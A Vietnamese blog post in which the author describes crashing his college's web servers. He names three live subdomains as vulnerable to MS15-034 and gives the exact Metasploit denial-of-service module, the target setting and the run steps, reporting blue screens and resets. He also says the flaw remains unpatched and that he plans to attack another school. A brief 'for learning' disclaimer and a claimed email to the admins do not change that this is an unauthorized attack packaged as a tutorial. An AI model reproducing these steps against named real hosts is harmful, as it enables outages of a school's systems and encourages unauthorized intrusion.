Tôi đã hack sụp web trường Cao đẳng kỹ thuật công nghệ Nha Trang như thế nào?

Tôi đã hack sụp web trường Cao đẳng kỹ thuật công nghệ Nha Trang như thế nào?

Lỗ hổng của LỖ HỔNG CỦA CDKTCNNT.EDU.VN

Chào các bạn, mình là Tiến Đạt. Thực ra lỗ hổng này theo như được biết thì mình đã phát hiện cách đây 1 tháng trước.

Nhưng mãi đến hôm nay (8/12/2019) mình mới rảnh để viết bài cũng như là chia sẻ cho các bạn biết và học hỏi. Đây là một lỗ hổng cũng rất nghiêm trọng. Nhưng mà lỗ hổng này nó không xuất phát từ người lập trình web, mà đây là lỗ hổng dựa vào máy chủ (server) của trường. Mà nói thật ra web trường mình cũng chẳng đẹp gì đâu, (Theo ý kiến cá nhân của mình thui nha, hahahahaha :)))

Lưu ý: Đây sự thật không phải là bài viết hướng dẫn nhằm mục đích phá hoại, mà đây là bài viết nhằm mục đích học tập và nghiên cứu. Mình sẽ không chịu trách nhiệm cho các bạn có bất cứ hành vi vi phạm nào. Chớ dại mà hack web của bộ công an nha hihi :))))

Ok, mỗi người mỗi nghề mà. Sau đây mình sẽ giới thiệu sơ về web của trường mình cho các bạn thấy nó như thế nào!
alt text

Đây là trang web tạo ra nhằm mục đích xem thông tin, các hoạt động của trường, xem điểm sinh viên,,, bla bla ,…

LÝ DO MÌNH HACK WEB TRƯỜNG

Tại sao mình có ý định hack web trường? Thực ra thì cách đây hình như … 6 tháng trước, tình cờ mình đăng nhập vào web trường thì tình cờ mình phát hiện một hiện tượng lạ! (Trần Dần? há há)

alt text

Đây là một ví dụ minh họa, mà các bạn có biết đây là gì hông? Đây chính là trang chủ mặc định của localhost trên windows server 2012, vì nó có hiện rõ ràng luôn kìa. Có thể tình cờ mình đăng nhập vào thì web trường đang bảo trì. Vậy là mình đã biết rõ web của trường dùng windows server 2012 :)))

ĐI TÌM LỖ HỔNG

OK vậy thì sao? Như vậy thì web trường vận hành được thì phải có server của trường chứ sao nữa :)). Ban đầu mình đã nghiên cứu, tìm hiểu, xem diễn đàn về các lỗ hổng của website các thứ rồi mọi thứ chẳng đâu vào đâu. Thế rồi tình cờ mình lên mạng tìm hiểu thì phát hiện windows server 2012 bị dính một lỗ hổng bảo mật nghiêm trọng, đó chính là lỗ hổng có mã là MS15-034. Vào check thử thì chính xác luôn!

Mô tả: MS15-034 được phát hiện vào năm 2015. Đây là lỗ hổng của máy chủ IIS Windows. Ảnh hướng đến giao thức http. Cụ thể, file http.sys là file chứa cấu hình cache của IIS. Kẻ tấn cộng sẽ lợi dụng gửi thực hiện điều khiển từ xa, khi gửi đến file này nhiều lần dẫn đến server sẽ bị crash. Và lỗ hổng này đã được microsoft vá lâu rồi nhá!

TÌM NHIỀU LỖI HƠN

Sau khi đã biết lỗ hổng của web trường. Mình đã suy ra website này bị dính lỗ hổng về bảo mật :))) mình tiến hành exploit để tìm ra nhiều trang web hơn, và thế là cả nguyên một đàn :))

Cụ thể, đây chính là 3 trang web của trường dính lỗ hổng

http://tkb.cdktcnnt.edu.vn/

http://sv.cdktcnnt.edu.vn/

http://gv.cdktcnnt.edu.vn/

Riêng trang chính thì không bị, nhưng mình sẽ tiếp tục nghiên cứu vì có thể còn dính những lỗ hổng khác

TIẾN HÀNH TẤN CÔNG

Ok, đủ dài dòng rồi, ta bắt đầu thực hành nhé!
Ở đây mình dùng Kali Linux
Đầu tiên mình mở metasploit lên
alt text

Gõ lệnh

use auxiliary/dos/http/ms15_034_ulonglongadd

Ấn ENTER
alt text

Bước này các bạn chỉ việc chọn tên 1 trong 3 trang web mà mình đã exploit được, giờ mình gõ sv.cdktcnnt.edu.vn nha

Ok các bạn gõ

SET RHOST sv.cdktcnnt.edu.vn

ấn ENTER để chọn mục tiêu khai thác

Sau đó các bạn gõ lệnh run ấn ENTER là chạy

Xem thành quả
alt text

OK gói tin đã được gửi đến server của trường và bị crash :))). Nếu bạn làm đến bước này thì nghĩa là bạn đã thành công.

Cùng vào trình duyệt test thử
alt text

Sau một hồi loading, xoay mãi, thì lúc này nó đã bị Not Found :)))

Ủa, như vậy sau khi bị tấn công, máy server của nhà trường đang bị làm sao?

Thì máy tính server sẽ bị màn hình xanh chứ sao :))) Sẽ bị reset lại. Mà có khi tấn công nhiều lần nó treo luôn ấy :))

OK Vậy xong rồi ha, sau khi bị tấn công thì server sẽ bị reset lại vào dĩ nhiên ta vẫn có thể vào web trường bình thường. Tuyệt đối các bạn đừng nên dùng cách này để đi phá hoại người khác.

LỜI KẾT

Hiện tại lỗ hổng này trên web trường vẫn chưa được vá. Bên quản trị mạng của trường vẫn chưa hề biết gì về hiện tượng lạ này. Mình đã vào trang liên hệ của trường, báo lỗi với quản trị viên của trang web và muốn hướng dẫn họ cách fix, (mình đã ẩn họ tên đi) nhưng vẫn chưa thấy ai trực tiếp trả lời mình qua email. Dự kiến tiếp theo là mình sẽ tìm một lỗ hổng bảo mật khác của website của một trường khác, sau đó mình sẽ tiếp tục đăng bài lên. Cảm ơn các bạn đã đọc. Hết rồi đó!

/* Mình hy vọng những bạn sau khi đọc xong bài viết này sẽ không biết được bí mật của mình */

Bình luận


White
{{ comment.user.name }}
Bỏ hay Hay
{{comment.like_count}}
Male avatar
{{ comment_error }}
Hủy
   

Hiển thị thử

Chỉnh sửa

White

Tiến Đạt

1 bài viết.
0 người follow
Kipalog
{{userFollowed ? 'Following' : 'Follow'}}
Bài viết liên quan
White
1 0
sudo du sh
t viết hơn 4 năm trước
1 0
{{like_count}}

kipalog

{{ comment_count }}

bình luận

{{liked ? "Đã kipalog" : "Kipalog"}}


White
{{userFollowed ? 'Following' : 'Follow'}}
1 bài viết.
0 người follow

 Đầu mục bài viết

Vẫn còn nữa! x

Kipalog vẫn còn rất nhiều bài viết hay và chủ đề thú vị chờ bạn khám phá!